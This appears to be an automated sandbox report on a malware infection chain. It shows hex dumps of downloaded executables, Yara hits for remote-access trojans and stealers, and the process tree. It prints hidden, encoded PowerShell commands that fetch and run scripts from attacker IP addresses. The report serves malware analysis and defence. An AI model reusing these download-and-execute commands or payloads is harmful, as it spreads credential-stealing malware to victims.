Jan 2, 2025 19:14:13.503917933 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:14:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 10:33:38 GMT ETag: "8a00-62ab6b1fe4fe2" Accept-Ranges: bytes Content-Length: 35328 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 69 0e 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 7a 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 0c 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELi"0z @ `(O H.text `.rsrc@@.reloc@B\H!`}0:(oi+aXi]Xi20(((o(0rpssor>sp~(o&or`sp~(o&o%~(oorsp~(orsp~(oo&((((j(rsp(o*BSJBv4.0.30319l4#~
Jan 2, 2025 19:14:13.503988981 CET	1236	IN	Data Raw: 00 00 34 04 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 d4 07 00 00 08 74 00 00 23 55 53 00 dc 7b 00 00 10 00 00 00 23 47 55 49 44 00 00 00 ec 7b 00 00 74 01 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 00 09 00 00 00 00 fa 01 33 Data Ascii: 4#Stringst#US{#GUID{t#BlobW3PPppQ1148
Jan 2, 2025 19:14:13.504024029 CET	1236	IN	Data Raw: 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c Data Ascii: tionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteMercado.exeNtilgEncodingSystem.Runtime.VersioningFro
Jan 2, 2025 19:14:13.504056931 CET	1236	IN	Data Raw: 00 66 00 47 00 41 00 4d 00 42 00 55 00 53 00 4d 00 47 00 49 00 55 00 67 00 59 00 62 00 46 00 49 00 55 00 66 00 53 00 77 00 6a 00 45 00 79 00 30 00 78 00 44 00 33 00 67 00 44 00 4b 00 78 00 74 00 4d 00 63 00 52 00 42 00 41 00 52 00 42 00 55 00 70 Data Ascii: fGAMBUSMGIUgYbFIUfSwjEy0xD3gDKxtMcRBARBUpAW9jYzsEJDYeAEwLG0xgVRxHHiktWlomNUxFSVsMTEIONUoGSAZMfUQUHjEoET0xFQwuCwF7L0geQx4p
Jan 2, 2025 19:14:13.504090071 CET	1236	IN	Data Raw: 00 6d 00 56 00 4e 00 4c 00 45 00 67 00 47 00 54 00 48 00 31 00 45 00 46 00 42 00 35 00 6a 00 4e 00 6d 00 68 00 43 00 59 00 31 00 73 00 4d 00 54 00 45 00 4a 00 56 00 47 00 47 00 41 00 47 00 53 00 41 00 5a 00 4d 00 66 00 77 00 39 00 52 00 54 00 43 Data Ascii: mVNLEgGTH1EFB5jNmhCY1sMTEJVGGAGSAZMfw9RTC0oCXtxWQBhaFUYYAZIBkx9RBQeY28LPCcXQE5OeDJgBkgGTH1EFB5jbUVqER5fGQ8QbChUDUcIf0g5NG
Jan 2, 2025 19:14:13.504102945 CET	1236	IN	Data Raw: 00 63 00 51 00 30 00 51 00 55 00 43 00 6b 00 42 00 75 00 4e 00 7a 00 39 00 46 00 49 00 43 00 49 00 56 00 53 00 41 00 41 00 48 00 58 00 41 00 4e 00 4e 00 4c 00 45 00 67 00 47 00 54 00 48 00 30 00 55 00 52 00 6c 00 63 00 31 00 4c 00 42 00 45 00 74 Data Ascii: cQ0QUCkBuNz9FICIVSAAHXANNLEgGTH0URlc1LBEtYx9JAAcSWTRDSEQDMggUbSY5Mic0TRg4CgddIUIrSQIpAUxKBygJLSQaWAlKPFY0dhxUTCkMRlsiKUlo
Jan 2, 2025 19:14:13.504116058 CET	1236	IN	Data Raw: 00 52 00 52 00 47 00 55 00 54 00 63 00 6f 00 42 00 6a 00 78 00 71 00 51 00 43 00 46 00 6d 00 51 00 6c 00 55 00 59 00 59 00 46 00 59 00 61 00 54 00 78 00 6f 00 38 00 45 00 46 00 45 00 65 00 4a 00 79 00 67 00 4a 00 4c 00 53 00 51 00 61 00 57 00 41 Data Ascii: RRGUTcoBjxqQCFmQlUYYFYaTxo8EFEeJygJLSQaWAlCF1cvSkhxHjQQUXMmIAo6Oj9JAAcSWTRDQG8CKTRATGM9FycgHl8fTlVRLlJIRA0uAXVaJz8AOzBXDA
Jan 2, 2025 19:14:13.504127026 CET	1236	IN	Data Raw: 00 78 00 49 00 67 00 59 00 74 00 4d 00 41 00 68 00 74 00 47 00 42 00 59 00 48 00 55 00 53 00 4a 00 54 00 48 00 45 00 4d 00 66 00 63 00 55 00 52 00 39 00 55 00 44 00 63 00 64 00 45 00 54 00 70 00 6a 00 44 00 30 00 51 00 65 00 42 00 78 00 52 00 63 Data Ascii: xIgYtMAhtGBYHUSJTHEMfcUR9UDcdETpjD0QeBxRcAVIcVAU/EUBbMGFoQmNbDExCVRhgRAdJAH0NWlYmPww8CxpCCA4QS2wGHU8CKURXTCYsESEsFWoAAxJL
Jan 2, 2025 19:14:13.504142046 CET	1236	IN	Data Raw: 00 32 00 74 00 53 00 64 00 31 00 38 00 2f 00 58 00 41 00 4e 00 4e 00 4c 00 45 00 67 00 47 00 54 00 48 00 30 00 55 00 52 00 6c 00 63 00 31 00 4c 00 42 00 45 00 74 00 59 00 77 00 68 00 59 00 44 00 52 00 59 00 63 00 57 00 32 00 42 00 31 00 44 00 56 Data Ascii: 2tSd18/XANNLEgGTH0URlc1LBEtYwhYDRYcW2B1DVI4NRZRXycOCiY3HlQYJhBUJUEJUgl9N1FKFyUXLSIfbwMMAV04UkgbTBELVVoCPQx0EB5YOAoHXSFCK0
Jan 2, 2025 19:14:13.504153967 CET	1236	IN	Data Raw: 00 4a 00 44 00 68 00 42 00 66 00 49 00 56 00 49 00 4e 00 42 00 6a 00 6f 00 30 00 46 00 6b 00 42 00 4c 00 49 00 69 00 45 00 6b 00 4a 00 43 00 38 00 55 00 54 00 79 00 6b 00 61 00 56 00 51 00 56 00 67 00 61 00 67 00 64 00 48 00 43 00 42 00 77 00 55 Data Ascii: JDhBfIVINBjo0FkBLIiEkJC8UTykaVQVgagdHCBwUXQIVJBc8NhpALQ4ZVyNjEGIJMQFTXzcoW2AEHlgtEhx2IUsNVUR0PwRjb20iLTc6XAUsFFUlVUAPN2o5
Jan 2, 2025 19:14:14.318819046 CET	157	OUT	GET /infopage/ersyb.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Jan 2, 2025 19:14:14.509876013 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 18:14:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 02 Jan 2025 09:39:17 GMT ETag: "2fdc00-62ab5ef921a41" Accept-Ranges: bytes Content-Length: 3136512 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@/S0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS/r68XNd/xeN[>F$y'E}+iG<

Target ID:	0
Start time:	13:14:04
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:14:04
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:14:05
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:14:09
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
Imagebase:	0x7ff73fb70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:14:09
Start date:	02/01/2025
Path:	C:\Windows\Temp\Package.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Temp\Package.exe
Imagebase:	0xd20000
File size:	206'304 bytes
MD5 hash:	2696D944FFBEF69510B0C826446FD748
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:14:10
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:14:10
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:14:10
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"
Imagebase:	0x3f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:14:12
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"
Imagebase:	0x740000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:14:12
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"
Imagebase:	0xd50000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:14:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x490000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:14:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:14:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:14:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:14:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:14:21
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204
Imagebase:	0x210000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF848CD33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236675376.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848cd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 64963a42fe2196a667ed450a996269e9fae4f6ed5eae1bd9286d9dfe19db03a2
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 6F01677115CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB45

Analysis Process: powershell.exePID: 2180, Parent PID: 3200COMMON

Executed Functions

Function 00007FF848D033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2216164883.00007FF848D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848d00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: cadf7c45b088c9c0b9ed52c884df090bc0b9bbd02cbc4300a5154b761c9ac79d
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 2C01677111CB0C4FD748EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB45

Function 00007FF848DD0FE8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2216635045.00007FF848DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e481bf982b9d083f8c51738d6d31deb0ee0286ad9bd3880ceedad94da3f5ec32
Instruction ID: 7db51215439ae1559cb5380122702f604124de041b27ab67aa8443cd72db4e58
Opcode Fuzzy Hash: e481bf982b9d083f8c51738d6d31deb0ee0286ad9bd3880ceedad94da3f5ec32
Instruction Fuzzy Hash: CFE0D833E0EC991EEBA1B65C34086F4A2D0EF58272B491177D90DC3186DE049C144795

Analysis Process: Package.exePID: 2972, Parent PID: 7104COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	1770
Total number of Limit Nodes:	38

Executed Functions

Function 00D2B905 Relevance: 73.7, APIs: 36, Strings: 6, Instructions: 159
libraryregistryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00D2B90F
#540.MFC42U(000005AC,00D2B566,00000000,00000011), ref: 00D2B91D
#4155.MFC42U(00000004,000005AC,00D2B566,00000000,00000011), ref: 00D2B92F
StringFromGUID2.OLE32(00D236E4,?), ref: 00D2B949
wsprintfW.USER32 ref: 00D2B95F
RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 00D2B982
#540.MFC42U ref: 00D2B998
#540.MFC42U ref: 00D2B9A7
#538.MFC42U(Comcat.DLL), ref: 00D2B9BB
LoadLibraryW.KERNEL32(?,Comcat.DLL), ref: 00D2BAAE
GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00D2BAC5
#4155.MFC42U(00000019), ref: 00D2BB0C
#4155.MFC42U(00000018,00000019), ref: 00D2BB19
#940.MFC42U(?,00000018,00000019), ref: 00D2BB2B
#1197.MFC42U(?,00000000,00000000,?,00000018,00000019), ref: 00D2BB38
FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000018,00000019), ref: 00D2BB3E
#6398.MFC42U(?,Version,0000003D,00000001,comcat.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,0000001A,?,00000018), ref: 00D2BB5B
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB66
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB71
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB7C
#800.MFC42U(?,00000004,00000000,?,0000001A,?,00000018,00000017), ref: 00D2BB87

Strings

Comcat.DLL, xrefs: 00D2B9AC
CLSID\%s, xrefs: 00D2B959
DllRegisterServer, xrefs: 00D2BABF
comcat.dll, xrefs: 00D2BA37
Version, xrefs: 00D2BB4B
DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|, xrefs: 00D2BA2C

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#4155#540$Library$#1197#538#6398#940AddressFreeFromH_prolog3_LoadProcQueryStringValuewsprintf
String ID: CLSID\%s$Comcat.DLL$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$Version$comcat.dll
API String ID: 446370969-4202070818
Opcode ID: f031a316bd0b64db242ef5382631820888faa2daeda8f2accd23842156877de5
Instruction ID: d851c3cce2af77ac48ce0f5ed81efca1770fd01a896a95c35f52a2e0404d3167
Opcode Fuzzy Hash: f031a316bd0b64db242ef5382631820888faa2daeda8f2accd23842156877de5
Instruction Fuzzy Hash: A8516131A416289ECB25EB50DC92BEEBB35EF25305F4041A9B185B61D1DFB05F88CE32

Function 00D2B4F0 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00D2B4F7

Part of subcall function 00D2B463: GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00D2B468
Part of subcall function 00D2B463: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00D2B479

GetVersionExW.KERNEL32(00D437B0,00000004), ref: 00D2B512

Part of subcall function 00D3BD2A: LoadLibraryW.KERNELBASE(ACLUI.DLL,00D2B51D), ref: 00D3BD38
Part of subcall function 00D3BD2A: MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 00D3BD50
Part of subcall function 00D3BD2A: exit.MSVCRT ref: 00D3BD58
Part of subcall function 00D3BD2A: GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 00D3BD64

#1202.MFC42U ref: 00D2B51D
#538.MFC42U(OleInitialize failed. Could not initialized OLE; OLEViewer cannot run.), ref: 00D2B530

Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
